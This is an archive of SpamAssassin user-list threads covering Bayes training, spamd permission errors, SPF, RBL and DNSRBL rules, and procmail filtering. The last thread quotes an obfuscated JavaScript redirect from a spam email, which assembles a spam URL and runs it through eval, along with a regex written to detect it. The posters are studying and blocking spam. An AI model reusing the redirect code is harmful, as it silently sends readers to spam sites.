even realize I wasn't receiving my own bills and I imagine other folks are 
not either.  Here are the headers from the message with some info REDACTED 
to avoid robots crawling for email addresses.  Our network admin says the 
IP is certainly a legal one, and it pings for us as well as for other 
people.  Anyway, here's another paste:


[begin paste]
Return-path: <[EMAIL PROTECTED]>
X-Spam-Flag: YES
X-Spam-Checker-Version: SpamAssassin 3.2.1 (2007-05-02) on 
mx03.mail.msu.edu

X-Spam-Level: *
X-Spam-Status: Yes, score=5.3 required=5.0 tests=INVALID_TZ_EST,
RCVD_ILLEGAL_IP shortcircuit=no autolearn=disabled version=3.2.1
X-Spam-Report:
*  2.1 INVALID_TZ_EST Invalid date in header (wrong EST timezone)
*  3.2 RCVD_ILLEGAL_IP Received: contains illegal IP address
Envelope-to: [EMAIL PROTECTED]
Delivery-date: Fri, 01 Aug 2008 06:15:17 -0400
Received: from mail.consumersenergy.com ([67.59.61.131] 
helo=dmzhpu01.cpco.com)

by mx03.mail.msu.edu with esmtp (Exim 4.63 #1)
id 1KOrfJ-00026T-Cg
for [EMAIL PROTECTED]; Fri, 01 Aug 2008 06:15:17 -0400
Received: from cmsenergy.com ([EMAIL PROTECTED] [1.226.208.65])
by dmzhpu01.cpco.com (8.11.1/8.11.1) with ESMTP id m71AFGJ28409
for <[EMAIL PROTECTED]>; Fri, 1 Aug 2008 06:15:17 -0400 (EDT)
Date: Fri, 1 Aug 2008 05:14:38 -0400 (EST)
From: "eServices" <[EMAIL PROTECTED]>
Subject: Consumers Energy bill ready to view
To: [EMAIL PROTECTED]
Reply-To: "eServices" <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
MIME-Version: 1.0
Importance: Normal
X-Priority: 3 (Normal)
X-Mailer: SAP Web Application Server 7.00
Content-Type: text/plain;
 charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Content-Description: Consumers Energy bill ready to view
X-Virus: None found by Clam AV

[end paste]

I'm guessing the IP address in question is: 1.226.208.65

While it certainly is not within a range I see all that often, I am 
assured by our hostmaster that it is legit.  Another one I've seen is 
1.226.208.61


Any ideas on why this is being picked up incorrectly?  Or are we way off 
base, and it is indeed *wrong?*  I am admittedly kind of new to dealing 
with the inner-workings of SpamAssassin.  I took the job as a mail admin 
a couple of years ago, and SA has simply *worked* as setup by the previous 
admin.  I'll be glad to dig around, but I'm still kind of learning it.


Thanks for any ideas.

Regards,
./brm

Re: sa-learn error message

2008-01-18 Thread Brian Eliassen


Hello Craig,

I recently ran into this problem myself.  The solution, after being a 
dolt and not running a backup first, was the following sequence 
followed by line definitions:


   /etc/init.d/mailserver stop
   sa-learn --backup > /etc/mail/spamassassin/database.bak
   sa-learn --dump magic
   sa-learn --no-sync --ham --progress --mbox /export/home/brian/Ham
   sa-learn --sync
   sa-learn --no-sync --spam --progress --mbox /export/home/brian/Spam
   sa-learn --sync
   sa-learn --dump magic
   spamassassin -D --lint
   /etc/init.d/mailserver start

1) Shutdown Sendmail/ClamAV/MIMEDefang/Spamassassin.
2) Backup the database.
3) View current statistics which will also display the current bayes 
database version.

4) Do a ham learn.
5) This one was key!  Even after everything was parsed and the 
command line came back, the database was still not in a happy place. 
Doing the --sync brings it to that happy place.

6) Do a spam learn.
7) See #5.
8) View current statistics and note nham and nspam increases.
9) Run through the rules to make sure everything is still cool and no 
errors occur.

10) Start Sendmail/ClamAV/MIMEDefang/Spamassassin.

Notes:

- Doing a --sync on the sa-learn learning process didn't work.  I'm 
not sure why the system doesn't learn the file and then just resync 
the database when it's done.  Maybe Theo has an idea.
- Shutting down the MTA isn't ideal but it prevents lock file 
conflicts which don't seem to work too well under Solaris 8.  Mail 
queues in the ether for about 30 minutes while all of this is going 
on.  I've even thought about automating the process which would help 
keep the Ham and Spam files at a reasonable size and shorten that to 
about 5 minutes.


-BE



Hi again SA experts,

Note the error message in the 2nd-last line of the following transcript:

animalhead:~/sj $ sa-learn --no-rebuild --spam --mbox savejunk
The --no-rebuild option has been deprecated.  Please use --no-sync instead.
Learned tokens from 3025 message(s) (3047 message(s) examined)
animalhead:~/sj $ sa-learn --no-sync --spam thruJunk
bayes: bayes db version 0 is not able to be used, aborting! at 
/usr/local/lib/perl5/site_perl/5.8.8/Mail/SpamAssassin/BayesStore/DBM.pm 
line 196.

Learned tokens from 170 message(s) (170 message(s) examined)

There are 171 messages in directory thruJunk.  The largest is 495K, 
the next largest is 137K.

$ sa-learn -Vyields "spamassassin v 3.2.1"

What should I do about this?

I still have another directory with ham to go.  It includes lots of 
large files.  Should I delete those over a certain size?


Thanks,
Craig MacKenna

Telling spamd to give up

2007-11-29 Thread Brian Bebeau


We're using SpamAssassin in our own filter. We call spamd
via the libspamc calls (specifically message_filter() to
do the real work). Everything works fine. Now I need to
figure out how to do large messages ( > 1M). I set the
timeout in the "struct message" struct and it times out
just fine and I can go on and do other things. However,
the spamd process keeps on processing the message, chewing
up CPU and, especially, memory. I can see the timeout happen,
as the log file gets:

Nov 29 16:10:34 developer spamd[1803]:  (child processing
timeout at /usr/bin/spamd line 1246,  line 154408.

10 minutes after it's started, but it still is processing the
message since it continues printing out rules that hit. Is
there some way I can tell spamd that I'm going away now and
it should stop processing the message? If I let it go, it
will eventually lock up my entire computer, not letting me
even move the mouse. Needless to say, that won't fly for
production use. So I could really use some way to tell it
to give up. If the only way is to not scan messages over a
certain size, I guess I'll have to live with that, but I
need to be able to tell TPTB that that's how it has to be.

--
Brian Bebeau
Trustwave
http://www.trustwave.com

Re: debbie-dealz / frosty-saver / got-hyrda / aero-dog spam

2007-09-12 Thread Brian Wilson


On Wed, 12 Sep 2007, Brian Wilson wrote:



I've somehow made it onto spam list that isn't being picked up by RBLs or by 
bayes.  All messages have a url that looks like this (where X's are all 
digits):


http://aero-dog.com/1-23-28276-45381XXX.html

All messages are originating from 206.131.x.x and I have been submitting them 
to spamcop.  A sample message is here: http://bubba.org/spam/newspam1.txt


Any suggestions for detecting this?  My bayes has been pretty much spot on 
for months, so this has me puzzled.




The sample was older so that is probably why it is being picked up, but 
the newer samples from here are not getting scored from RBL's.  I 
added this URI rule to pick these up:


uri FROSTY_SAVER_URI /^http\:\/\/[\S\-]+\/[\d\-]+.html/ score 
FROSTY_SAVER_URI 10


I'm sure someone will complain that they have a better regex, but it's 
working for me.


Brian

debbie-dealz / frosty-saver / got-hyrda / aero-dog spam

2007-09-12 Thread Brian Wilson



I've somehow made it onto spam list that isn't being picked up by RBLs or 
by bayes.  All messages have a url that looks like this (where X's are 
all digits):


http://aero-dog.com/1-23-28276-45381XXX.html

All messages are originating from 206.131.x.x and I have been submitting 
them to spamcop.  A sample message is here: 
http://bubba.org/spam/newspam1.txt


Any suggestions for detecting this?  My bayes has been pretty much spot on 
for months, so this has me puzzled.


Thanks,
Brian

Re: How do I temporarily disable SpamAssassin?

2007-08-19 Thread brian


[EMAIL PROTECTED] wrote:

I have a FreeBSD machine running qmail, SpamAssassin and ClamAV.

I want to temporarily disable SpamAssassin to free up enough
resources to let the mail queue clear.  How do I do that?



Further to the other comments, this page might be helpful:

qmail + spamassassin + clamav quick reference
http://www.rauros.net/projects/qmail/

good luck!

Re: spamd is dying

2007-08-16 Thread brian ally


maillist wrote:

brian ally wrote:


postfix-2.3.3-1
cyrus-imapd-2.2.10-3
spamassassin-3.1.5-1
spamass-milter-0.3.0-1.1.fc2.rf
perl-Mail-SpamAssassin-3.1.5-1

I'm seeing spamd processes dying consistently:

How are you starting spamd?  I think you are starting spamd as a user 
without permissions to /var/spool/spamassassin/bayes.


A script in /etc/init.d (SA was installed as a fedora RPM). The relevant 
lines:

-- snip --
prog="spamd"

# Source networking configuration.
. /etc/sysconfig/network

# Check that networking is up.
[ ${NETWORKING} = "no" ] && exit 0

# Set default spamd configuration.
#SPAMDOPTIONS="-d -c -m5 -H"
SPAMDOPTIONS="-d -m5 -H"
SPAMD_PID=/var/run/spamd.pid

# Source spamd configuration.
if [ -f /etc/sysconfig/spamassassin ] ; then
. /etc/sysconfig/spamassassin
fi

[ -f /usr/bin/spamd -o -f /usr/local/bin/spamd ] || exit 0
PATH=$PATH:/usr/bin:/usr/local/bin

# By default it's all good
RETVAL=0

# See how we were called.
case "$1" in
  start)
# Start daemon.
echo -n $"Starting $prog: "
daemon $NICELEVEL spamd $SPAMDOPTIONS -r $SPAMD_PID
RETVAL=$?
echo
if [ $RETVAL = 0 ]; then
touch /var/lock/subsys/spamassassin
fi
;;
-- snip --

Also, in my experience, that line in your config file should actually be 
changed from:


bayes_path /var/spool/spamassassin/bayes

to:

bayes_path /var/spool/spamassassin/bayes/bayes


Aarghh! Why is this so opaque in the docs? FWIW, google shows 660 pages 
for "bayes" vs. 7 for "bayes/bayes". I'm thinking that it doesn't really 
matter, as long as the daemons can find what's been created.


What about the missing journal? Is that an issue here?


I start spamd like this:

/usr/bin/spamd -r /var/run/spamd.pid \
-d --username=defang --max-spare=8 --min-children=10 --max-children=45



I'll try some of those params. Certainly, i should bump up the 
max-children from 5 and see if that helps.


One thing that just jumped out at me is that this init script has -H, 
which expects a directory as an argument:


 -H [dir], --helper-home-dir[=dir] Specify a different HOME directory

Maybe that has something to do with this. I'll drop it (or should i give 
it "/var/spool/spamassassin"?) and see if that works.


Thanks!

brian

spamd is dying

2007-08-16 Thread brian ally


postfix-2.3.3-1
cyrus-imapd-2.2.10-3
spamassassin-3.1.5-1
spamass-milter-0.3.0-1.1.fc2.rf
perl-Mail-SpamAssassin-3.1.5-1

I'm seeing spamd processes dying consistently:

Aug 13 09:06:07 subtropolix spamd[23480]: bayes: cannot open bayes
databases /var/spool/spamassassin/bayes_* R/O: tie failed: Permission denied
Aug 13 09:06:07 subtropolix spamd[23480]: bayes: locker: safe_lock:
cannot create tmp lockfile
/var/spool/spamassassin/bayes.lock.subtropolix.org.23480 for
/var/spool/spamassassin/bayes.lock: Permission denied
Aug 13 09:06:07 subtropolix spamd[23480]: spamd: clean message
(-0.2/5.0) for filter:5002 in 27.5 seconds, 3069 bytes.
Aug 13 09:06:07 subtropolix spamd[23480]: spamd: result: . 0 - AWL
scantime=27.5,size=3069,user=filter,uid=5002,required_score=5.0,rhost=subtropolix.org,\
raddr=127.0.0.1,rport=35144,mid=<[EMAIL PROTECTED]>,\
autolearn=failed
Aug 13 09:07:40 subtropolix spamc[26720]: connect(AF_INET) to spamd at
127.0.0.1 failed, retrying (#1 of 3): Connection refused

# service spamassassin status
spamd dead but pid file exists
# service spamassassin start
Starting spamd:  [  OK  ]

Here're some lines from maillog from when it's been restarted:


Aug 16 13:09:54 subtropolix spamd[19296]: rules: meta test
DIGEST_MULTIPLE has undefined dependency 'DCC_CHECK'
Aug 16 13:09:59 subtropolix spamd[19296]: spamd: server started on port
783/tcp (running version 3.1.5)
Aug 16 13:09:59 subtropolix spamd[19296]: spamd: server pid: 19296
Aug 16 13:10:18 subtropolix spamd[24919]: bayes: locker: safe_lock:
cannot create tmp lockfile
/var/spool/spamassassin/bayes.lock.subtropolix.org.24919 for
/var/spool/spamassassin/bayes.lock: Permission denied
Aug 16 13:10:18 subtropolix spamd[24919]: spamd: clean message
(-100.9/5.0) for filter:5002 in 18.0 seconds, 117248 bytes.
Aug 16 13:10:18 subtropolix spamd[24919]: spamd: result: . -100 -
AWL,HTML_MESSAGE,USER_IN_WHITELIST\
scantime=18.0,size=117248,user=filter,uid=5002,required_score=5.0,rhost=subtropolix.org,\
raddr=127.0.0.1,rport=53653,mid=<[EMAIL PROTECTED]>,autolearn=failed


I'm also curious about the "autolearn=failed" on that last line.

/etc/postfix/master.cf:
filterunix  -   n   n   -   -   pipe
flags=Rq user=filter argv=/usr/local/anomy/spamc.sh -f ${sender} -- 
${recipient}


local.cf:
rewrite_header Subject [SPAM]
lock_method flock
required_score 5.0
use_bayes 1
bayes_auto_learn 1
bayes_path /var/spool/spamassassin/bayes

# ls -l /var/spool/spamassassin/
total 2723
-rw---  1 root root  162816 Aug 16 01:20 bayes_seen
-rw---  1 mail mail 2618368 Aug 16 01:20 bayes_toks

/var spool spamassassin has:
drwxr-xr-x   3 mailmail2048 Aug 16 01:20 spamassassin

Note there's no journal. I haven't figured out why (nor if it's
important). Does anything jump out at anyone as to why spamd might be
dying like this? I have googled for this but have yet to come across a 
definitive answer.

Re: Blacklist mail

2007-08-16 Thread Brian Godette

Johnson, S wrote:
> The only reason I ask about if I should "learn" the messages is that
> my users have a hard time putting good email into the good email
> folder.  Everyone is quick to put in spam messages though.  My filter
> is getting about 50 to 1 spam to ham right now.  Everything I've
> read/heard states that I should try to be close to 1 to 1 for optimum
> spam hits.  If I add this into the learn then I'll be shooting up the
> filter to close to 100 to 1 (or more).  Should I be worried about
> that?
> 

About that only thing you can do to get more ham learned, without
invading your user's illusion of email privacy, is turn on auto-learning
and adjust bayes_auto_learn_threshold_spam to something reasonably high
since you have a user driven spam feed, and maybe adjust
bayes_auto_learn_threshold_nonspam to be a little more free with what it
considers ham (shouldn't need to tho).

Re: Question - How many of you run ALL your email through SA?

2007-08-16 Thread Brian Godette

Marc Perkel wrote:
> As opposed to preprocessing before using SA to reduce the load. (ie. 
> using blacklist and whitelist before SA)
> 

We don't.

We use a locally modified MaRBL that uses weighted scoring, RHSBLs
against helo/sender domain/reverse, and the BOTNET plugin (each
meta-rule gets its own weight), then greylisting (gld policy server),
then clamav w/sane+msrbl, then finally SA. All this does for us is
reduce the load on the spamd servers and bayes database, the amount of
marked spam that would actually get to a user that /dev/null's over a
certain score does not change significantly.

This brings the detected spam rate to about 2% of all delivery attempts
or 14.8% of what SA sees; what the user sees may be much less depending
on what they set their /dev/null score to.

We used to use just greylisting, but it was becoming far less effective
over time (~8 months ago), by adding weighted rbl lookups to reject at
SMTP time and then greylist the rest, the amount of spam as seen by SA
dropped to 12% of what it was with just greylisting alone.

At some point we should add in SPF checks to MaRBL and maybe integrate
p0f from its latest release.

SMTP AUTH problem/question

2007-06-06 Thread Brian C. Hill

I have read the documentation over and over again and
must be missing something. It seems to me that the default
behavior is to give everything that has been through SMTP AUTH
a high negative score, and that I shouldn't have to configure
anything. It isn't working, though. My users don't connect from
trusted networks, which is why they have to SMTP AUTH to relay
mail through my system.

Am I missing something? Will that high negative score
only be applied to SMTP AUTH from trusted nets?

Brian

RE: AWL Troubles

2007-05-07 Thread Brian Wilson


On Mon, 7 May 2007, Abba Communications - www.abbacomm.net wrote:




Thanks for the advise.  Is there a way to view the contents of the AWL?  How
do I remove the table?





Go into your source directory Mail-SpamAssassin-3.2.0/tools and look for 
check_whitelist.  This will dump the contents of your whitelist and show 
you the scores.


You can remove addresses by using spamassassin -R (use --help for other 
whitelist commands).


Or if you want to remove the whole thing, the file (at least for me) is 
called "auto-whitelist" and in ~/.spamassassin but this may depened on 
your auto_whitelist_path variable or may be in a global location.


-B

Re: [AMaViS-user] Most RBL DNS entries are failing

2007-05-01 Thread Brian C. Dilley

I can't resolve them here (tried on two different co-located servers as
well)

On Tue, 2007-05-01 at 21:05 +0200, Oenus Tech Services wrote:

> Hello. I know this is a little off-topic, but I'm having this problem
> and I guess this is a good place to ask for this kind of help. Today,
> 1st of May, I have noticed that most RBL are unavailable, at least from
> many dns servers here in Spain. if I do nslookup or pings to:
> 
> zen.spamhaus.org
> sbl-xbl.spamhaus.org
> pbl.spamhaus.org
> safe.dnsbl.sorbs.net
> list.dsbl.org
> 
> all show as unknown servers.
> 
> I've been able to get queries for ix.dnsbl.manitu.net, dnsbl.njabl.org,
> and bl.spamcop.net occasionally today, so I got their IP addresses in a
> list now.
> 
> Can anybody confirm this?
> 
> If somebody who might get dns queries for those subdomains would be kind
> enough to post their IP addresses, I would really appreciate that.
> 
> TIA,
> 
> Ignacio
> 
> 
> -
> This SF.net email is sponsored by DB2 Express
> Download DB2 Express C - the FREE version of DB2 express and take
> control of your XML. No limits. Just data. Click to get it now.
> http://sourceforge.net/powerbar/db2/
> ___
> AMaViS-user mailing list
> [EMAIL PROTECTED]
> https://lists.sourceforge.net/lists/listinfo/amavis-user
> AMaViS-FAQ:http://www.amavis.org/amavis-faq.php3
> AMaViS-HowTos:http://www.amavis.org/howto/

Re: RBL tests on MTA vs. RBL rules on SA

2007-04-27 Thread Brian Godette

Oenus Tech Services wrote:
> After much testing, we have decided to put the RBLs on Postfix for
> performance reasons. Before checking with those RBLs, our system does
> EHLO checks against a known-spammer blacklist database as well to filter
> the most obvious cases. Then we use zen.spamhaus.org,
> safe.dnsbl.sorbs.net, and bl.spamcop.net, in this order. Next we do

safe.dnsbl.sorbs.net includes new.spam.dnsbl.sorbs.net which is not very
safe at all. bl.spamcop.net isn't all that safe either. Both will
routinely hit on the free email providers and major ISPs outgoing MTAs.
This is because both have automatic systems generating them.

Its fairly hard for any sizable ISP or mail provider to not constantly
be going on and off new.spam and spamcop lists given harvested/weak
passwords and the newer bots that will use the MTA configured in the
default mail client of the zombied system including being able to do
SMTP-AUTH.

"safe" sorbs would be something along the lines of:
dul.dnsbl.sorbs.net + relays.dnsbl.sorbs.net + zombie.dnsbl.sorbs.net

Re: Alternative to red.uribl.com?

2007-04-06 Thread Brian Wilson



On Apr 6, 2007, at 2:12 AM, Bill Landry wrote:


ram wrote the following on 4/5/2007 10:23 PM -0800:

On Wed, 2007-04-04 at 08:11 -0700, Bill Landry wrote:


ram wrote the following on 4/4/2007 12:56 AM -0800:


On Tue, 2007-04-03 at 13:15 -0700, Bill Landry wrote:



Dave Pooser wrote the following on 4/3/2007 11:19 AM -0800:


I'm seeing a bunch of spam using URLs from domains created on  
the same day
or in the past day or two. I don't know how red.uribl.com  
works, but I
imagine it missed the same-day stuff because its automated  
process needs
time to work. Is there a better way to handle this-- possibly  
pulling the
information from whois during mail processing? (Although that  
would be
resource-intensive and would probably run afoul of their  
prohibition on

high-volume querying, so that's probably a lose.)



Maybe have a look at using "The Day Old Bread List" DNSRBL?   
More info

at http://support-intelligence.com/dob/



This seems to be a intelligent idea. Can I subscribe to their  
DOB lists

alone.

What are the zones to query ?


No subscription necessary to use the DNSRBL service.  Here is how  
I've

been using their list with SA:

header __RCVD_IN_DOBeval:check_rbl('dob',
'dob.sibl.support-intelligence.net.', '255')
describe __RCVD_IN_DOB  Received via relay in new domain (Day Old  
Bread)

tflags __RCVD_IN_DOBnet
score __RCVD_IN_DOB 0

header RCVD_IN_DOB  eval:check_rbl_sub('dob', '127.0.0.2')
describe RCVD_IN_DOBReceived via relay in new domain (Day Old  
Bread)

tflags RCVD_IN_DOB  net
score RCVD_IN_DOB   1.667

header DNS_FROM_DOB
eval:check_rbl_envfrom('dob','dob.sibl.support-intelligence.net.')
describe DNS_FROM_DOB   Sender from new domain (Day Old Bread)
tflags DNS_FROM_DOB net
score DNS_FROM_DOB  1.334

urirhssub URIBL_RHS_DOB dob.sibl.support-intelligence.net  A   
127.0.0.2

body URIBL_RHS_DOB  eval:check_uridnsbl('URIBL_RHS_DOB')
describe URIBL_RHS_DOB  Contains an URI of a new domain (Day Old  
Bread)

tflags URIBL_RHS_DOBnet
score URIBL_RHS_DOB 2.75




Is this zone alive ??

I put this is my local.cf since yesterday. Havent seen a single hit

urirhssub URIBL_RHS_DOB dob.sibl.support-intelligence.net   
A   2

body URIBL_RHS_DOB  eval:check_uridnsbl('URIBL_RHS_DOB')
describe URIBL_RHS_DOB  Contains an URI of a new domain  
(Day Old Bread)

score URIBL_RHS_DOB  1.0


Thanks
Ram


Yep, it's alive.  I got 56 hits on URIBL_RHS_DOB on one of my servers
today.  Try copying what I originally sent to the list instead of your
modified version.

Bill



I can also confirm Bill's unmodified version works like a charm. 8  
hits on my single mailbox since yesterday.


Brian

Re: bayes autolearn only on non image mails

2007-03-31 Thread Brian Wilson



On Mar 31, 2007, at 11:06 AM, ram wrote:

Can I configure SA to autolearn only on non image mails. Prbably  
use in

conjunction with the LARGO rulesets


If a mail contains an image , this could probably be an image spam  
and I

dont want to learn words from here and poison my database

There was a thread last week about but I could get no answer on the  
auto

learn issue

Thanks
Ram


This is what I do from .procmailrc.  I have autolearn turned off.

I have a Junk Maildir and Junk/Bad Maildir nested inside of Junk.  I  
never verify things in Bad, and verify everything in Junk.   I can  
manually learn non-Bad things in Junk by dragging to one of my Auto  
folders.  I have Auto/Ham, Auto/HamBayes, Auto/Spam, Auto/SpamBayes.   
A cronjob will take things in these dirs and if they are Ham,  
classify them as such and redeliver them to my Inbox, Spam gets  
classified as Spam and moved to a non-mail directory to be archived.   
The "Bayes" folders are for classifying but not scoring (using a  
homegrown stats program... can't have my numbers getting thrown off).


# if spamassassin thinks it's > 10, lets classify it as spam and mark  
bad

:0
* ^X-Spam-Checker-Version: SpamAssassin .* on .*\.myhost\.com
* ^X-Spam-Level: \*\*\*\*\*\*\*\*\*\*
{
# learn as spam if > 10 and not image spam
:0c
* ^X-Spam-Status: .*autolearn=disabled.*
* !^Content-Type:.*(multipart/related).*
| $HOME/local/bin/sa-learn --spam --no-sync

# score as successful spam catch
:0ci
| $HOME/bin/sa_score.pl -s

# put in Bad Junk dir.
:0
/home/bdwilson/Maildir/.Junk.Bad/
}

# if < 10 in SA score, don't bayes learn and only put in Junk.
# user can drag to Auto/SpamBayes if it is truly spam to get added to
# bayes without affecting sa_score stats.
:0
* ^X-Spam-Checker-Version: SpamAssassin .* on .*\.myhost\.com
* ^X-Spam-Status: Yes
{
# score as spam catch
:0ci
| $HOME/bin/sa_score.pl -s

# only put in Junk
:0
/home/bdwilson/Maildir/.Junk/
}

# everything else I manually mark as ham.

Re: could someone run these messages....

2007-03-26 Thread Brian Wilson


On Mon, 26 Mar 2007, maillist wrote:



The only tests that they score for me are BAYES_99, which should be enough to 
get them sent to my spam-drop, but they get to the users instead.  When I 
--lint -D I don't see anything that tells me that I have a config problem.


I start spamd this way, as root...

/usr/bin/spamd -r /var/run/spamd.pid \
-d --username=defang --max-spare=5 --min-children=5 --max-children=35

slackware
sendmail 8.14.0
mimedefang 2.61
SpamAssassin version 3.1.8
running on Perl version 5.8.8

What do you score for these emails?
http://securebackend.net/mail_temp/aubrey.txt (I put 2 messages there)

-=Aubrey=-



1st message:

Content analysis details:   (13.1 points, 4.5 required)

 pts rule name  description
 -- --
 7.0 KAM_6C822ECF   $6c822ecf@ VERY prevalent message-ID header in SPAMs
 4.2 BAYES_99   BODY: Bayesian spam probability is 99 to 100%
[score: 1.]
 1.9 RCVD_IN_NJABL_DUL  RBL: NJABL: dialup sender did non-local SMTP
[88.245.62.188 listed in combined.njabl.org]
 0.0 RCVD_IN_PBLRBL: Received via a relay in Spamhaus PBL
[88.245.62.188 listed in zen.spamhaus.org]

2nd message:  BAYES_99 only.

Re: Who is emaildirect.com and CIHost?

2007-03-24 Thread Brian Wilson



On Mar 24, 2007, at 3:35 PM, Gene Heskett wrote:


On Saturday 24 March 2007, jdow wrote:

I was recently on the receiving end of an ssh attack (which had less
chance of success than a nitrocellulose cat in a traditional hell of
succeeding) from CIHost. And now I received a spate of low scoring  
DKIM

identified spams from emaildirect.com, which is hosted in CIHost's
address range.

O1.com NETBLK-O1-BLK4 (NET-65-98-128-0-1)
 65.98.128.0 - 65.98.255.255
EmailDirect, Inc. NETBLK-65-98-146-0 (NET-65-98-146-0-1)
 65.98.146.0 - 65.98.146.255


Were they legitimate at one time?

{^_^}


Dunno Joanne.  I rather get a charge out of watching the logs in my  
dd-wrt

router, running on an old x86 box.

When somebody starts a dictionary attack, I might let it run for  
maybe 30

minutes & then send the admin of record for that registration a please
shut this person down message.  It usually takes 5 minutes to  
stop.  And
all of them have recently come from the same ISP in tw land.  If it  
keeps

up, I'll just block that while class C and be done with it.

Bad puppies, should always be disposed of.



or you could save your time and have a script take care of all that  
(http://bubba.org/logact).

Re: Problem with forwarding and SPF

2007-03-19 Thread Brian Wilson



On Mar 19, 2007, at 5:22 AM, Paul Hurley wrote:


Hello all, Happy Pi day for last week...

I'm running Spam Assassin V3.1.7.0 via SAProxy for Win32 (http:// 
sourceforge.net/projects/sawin32/).  I've recently implemented SPF  
for my domain, which is working well.  However I ahve a problem  
with SPF on email I receieve.  I have a few old email accounts that  
use forwarding into my current account.  These generate false SPF  
failures because of the forward (see below, this is a recruitment  
email that is ham to me)


Now I could create a rule for mail receievd from 172.20.8.86 and a  
meta rule that cancelled out mail that hit SPF fails and the  
receieved rule, but that essentially means turning off SPF for that  
domain.  Any better ideas ?


Thanks

Paul.



This mail is probably spam. The original message
has been attached intact in RFC 822 format.

Content preview:  Employers of Choice Employers of choice New  
Scientist
  Jobs Employers of Choice are organisations that are searching  
for the
  best science and technology jobseekers. Do you fit their brief?  
To find
  out more details and view any current vacancies from the  
organisations

  below, just click on their logo. To search for a specific job visit
  NewScientistJobs.com [...]

Content analysis details:   (6.5 points, 6.0 required)

 0.1 cust_LOCAL_TO_RCVD Found Received: after the To:
 0.0 RM_hc_HTML Email is text/html format
-0.0 PH_TO_PAULHHas Paul.Hurley@ in To:
 1.4 SPF_SOFTFAIL   SPF: sender does not match SPF record  
(softfail)
[SPF failed: Please see http://spf.pobox.com/why.html? 
sender=newscientistjobs% 
40email.newscientist.com&ip=172.20.8.86&receiver=casseopia]
 0.5 DATE_IN_PAST_03_06 Date: is 3 to 6 hours before Received:  
date
 0.1 PH_BODY_LERA   BODY: Body contains a gappy version of  
'le..ra'

 0.1 HTML_MESSAGE   BODY: HTML included in message
 0.0 BAYES_50   BODY: Bayesian spam probability is 40  
to 60%

[score: 0.5000]
 0.0 MIME_HTML_ONLY BODY: Message only has text/html MIME  
parts
 0.0 RM_rb_ANCHOR   RAW: Testing for HTML end of anchor in  
emails

 0.0 RM_rb_TITLERAW: Testing for HTML title in emails
 0.0 RM_rb_HTML RAW: Testing for HTML tag in emails
 0.0 RM_rb_BREAKRAW: Testing for HTML Break in emails
 0.0 RM_rb_FONT RAW: Testing for HTML Font tag in emails
 0.0 RM_rb_PARA RAW: Testing for HTML Paragraph in emails
 4.0 DCC_CHECK  Listed in DCC (http://rhyolite.com/ 
anti-spam/dcc/)
 0.2 DNS_FROM_RFC_ABUSE RBL: Envelope sender in abuse.rfc- 
ignorant.org
 0.1 AWLAWL: From: address is in the auto  
white-list


The original message was not completely plain text and may be  
unsafe to

open with some email clients; in particular, it may contain a virus
or confirm that your address can receive spam.  If you wish to view
it, it may be safer to save it to a file and open it with an editor.




Subject:
Employers of choice
From:
"New Scientist Jobs"<[EMAIL PROTECTED]>
Date:
Mon, 12 Mar 2007 14:18:24 + (GMT)
To:
[EMAIL PROTECTED]
To:
[EMAIL PROTECTED]
Delivered-To:
[EMAIL PROTECTED]
Received:
(qmail 29777 invoked from network); 12 Mar 2007 18:31:30 -
Received:
from smtp-a02.internal.boltblue.com (HELO smtp.boltblue.com)  
([172.20.8.86]) (envelope-sender  
<[EMAIL PROTECTED]>) by  
bblite.backend.boltblue.com (qmail-ldap-1.03) with SMTP for  
<[EMAIL PROTECTED]>; 12 Mar 2007 18:31:30 -

Received:
(qmail 92833 invoked from network); 12 Mar 2007 17:22:47 -
Received:
from unknown (HELO mta1.primary.edc.dartmail.net) (216.73.95.131)  
by smtp-a02.boltblue.com with SMTP; 12 Mar 2007 17:22:47 -

Message-ID:
<[EMAIL PROTECTED]>







Unless you manage DNS for newscientist.com then you're SOL.  SPF has  
to deal with verifying that the sending party's IP address is  
authorized to send email from that particular domain  
(newscientist.com) and does not have to do anything with your domain  
or domains that forward to your email address unless you are sending  
the message.  Click the link where SPF failed and read.


-B

Re: Can't Locate Tie/Handle.pm

2007-03-16 Thread Brian Wilson


On Fri, 16 Mar 2007, John D. Hardin wrote:


On Fri, 16 Mar 2007, Marc Perkel wrote:


Getting this error:

Can't Locate Tie/Handle.pm

Where do I find this and how do you figure out where to find it?


...doesn't the SA documentation or wiki have a list of required
CPAN dependencies somewhere in the installation instructions?



The INSTALL file covers this does it not?

Required Perl Modules
-

In addition to the modules associated with Perl, some additional modules
need to be installed or upgraded depending on the version of Perl that you
are running.

You can get an immediate report on which of these modules you may need (or
want) to upgrade, by running "perl build/check_dependencies" from the
SpamAssassin build directory.

...

Optional Modules

...

Re: Low Scoring Message



On Mar 14, 2007, at 7:08 PM, Daryl C. W. O'Shea wrote:


Brian Wilson wrote:

On Wed, 14 Mar 2007, John D. Hardin wrote:

On Wed, 14 Mar 2007, Daryl C. W. O'Shea wrote:


Anyway... this is the redirect code they're using:

   
 yvxj = "ef=";kacm = "ttp://";apgy = "fe";ioo =  
</tt><tt>"'h";usf =
</tt><pre style="margin: 0em;">
"ershikin";uos = ".";iaswx = "inj";bdj = "com'";rpul = "l";fgbww =
"nhu";wnx = "ocation.
</pre><tt>hr";jftrg = rpul + wnx + yvxj + ioo + kacm + apgy + fgbww +  
</tt><tt>iaswx + usf
</tt><pre style="margin: 0em;">
+ uos + bdj; eval(jftrg); 
   


Quick and dirty, a regex that would work for a Web-Redirect  
header rule:


  /( \+ [a-z]{1,6}){4}; eval\([a-z]{1,6}\); <\/script>/


How about a much simpler rule that just adds 100 points for any mail
with a

Re: Low Scoring Message


On Wed, 14 Mar 2007, John D. Hardin wrote:


On Wed, 14 Mar 2007, Daryl C. W. O'Shea wrote:


Anyway... this is the redirect code they're using:

   
 yvxj = "ef=";kacm = "ttp://";apgy = "fe";ioo = "'h";usf =
"ershikin";uos = ".";iaswx = "inj";bdj = "com'";rpul = "l";fgbww =
"nhu";wnx = "ocation.
hr";jftrg = rpul + wnx + yvxj + ioo + kacm + apgy + fgbww + iaswx + usf
+ uos + bdj; eval(jftrg); 
   


Quick and dirty, a regex that would work for a Web-Redirect header rule:

  /( \+ [a-z]{1,6}){4}; eval\([a-z]{1,6}\); <\/script>/


How about a much simpler rule that just adds 100 points for any mail
with a

Re: Low Scoring Message


On Wed, 14 Mar 2007, Daryl C. W. O'Shea wrote:


Brian Wilson wrote:


